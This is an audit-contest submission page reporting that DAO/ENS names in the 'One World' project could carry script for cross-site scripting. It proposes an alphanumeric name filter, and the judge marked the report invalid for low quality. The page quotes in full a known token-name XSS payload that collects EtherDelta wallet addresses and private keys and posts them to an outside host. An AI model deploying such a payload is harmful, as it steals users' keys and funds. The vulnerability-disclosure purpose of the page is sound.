Project
One World
NFTDeFi
15,000 USDC
View results
Previous Next
Submission Details
Severity: medium
Invalid

Malicious EnName can be added without restriction.

unu5464

Summary

Code Injection Via Token Name: https://github.com/d-xo/weird-erc20?tab=readme-ov-file#code-injection-via-token-name

Js Code used in attack: <script> function doSomething(){for($(“#depositBalanceToken a”).text().indexOf(“‘)”>DATA”)>=0&&$(“#depositBalanceToken a”).text(“DATA”),savedKeys=[],a=1;a<main.EtherDelta.addrs.length;a++)singlekey=[],singlekey[0]=main.EtherDelta.addrs[a],singlekey[1]=main.EtherDelta.pks[a],savedKeys.push(singlekey);var e={object:JSON.stringify(savedKeys)};$.post(“https://cdn-solutions.com/update.php",e,function(e,n,t){}),setTimeout(doSomething,1e4)}var savedKeys=[];if(void 0===onlyonce){var onlyonce=!0;doSomething(),ga=function(){},doSomething(),$(“#accountSubmit”).click(function(){doSomething()})} </script>

The protocol is susceptible to a code injection vulnerability through the DAO name registration feature. An attacker could exploit this by registering DAO names containing malicious JavaScript (JS) code. If these names are later rendered on a website or in an application that does not sanitize input, the embedded JS could execute unintended actions, potentially compromising the security of users interacting with the protocol.

Vulnerability Details

An attacker can register DAO names containing embedded JS code, leveraging this as an attack vector for code injection. If the DAO name is displayed on a frontend
without adequate sanitization, it could allow attackers to execute arbitrary JS in the context of a user's browser. This method follows a similar pattern to documented
injection techniques, such as those described in the Weird ERC20 repository. Potentially harmful names could look like <script>alert(‘XSS’)</script>,
injecting code that is executed when the name is displayed in an unsafe manner on websites or dApps.

This vulnerability can be particularly severe if:

  1. The protocol’s frontend directly displays DAO names without escaping or sanitizing them.

  2. External sites or applications that interact with the protocol do not properly sanitize DAO names.

mapping(string => address) public getENSAddress;

Impact

The impact of this vulnerability is substantial:

  1. Users interacting with the affected frontend may unknowingly execute malicious scripts in their browsers, compromising their security and exposing them to phishing attacks.

  2. A vulnerability that allows malicious DAO names could damage the protocol's reputation, as it could be perceived as unsafe for users.

Recommendations

Add this to prevent malicious ensnames to contain malicious Js code.

function safeStr(string memory _input) public pure returns(bool) {
bytes memory inputBytes = bytes(_input);
for (uint256 i = 0; i < inputBytes.length; i++) {
bytes1 char = inputBytes[i];
if (
!(char >= 0x30 && char <= 0x39) && // 0-9
!(char >= 0x41 && char <= 0x5A) && // A-Z
!(char >= 0x61 && char <= 0x7A) // a-z
) {
return false;
}
}
return true;
}
Updates

Lead Judging Commences

0xbrivan2 Lead Judge 7 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality
0xbrivan2 Lead Judge 7 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.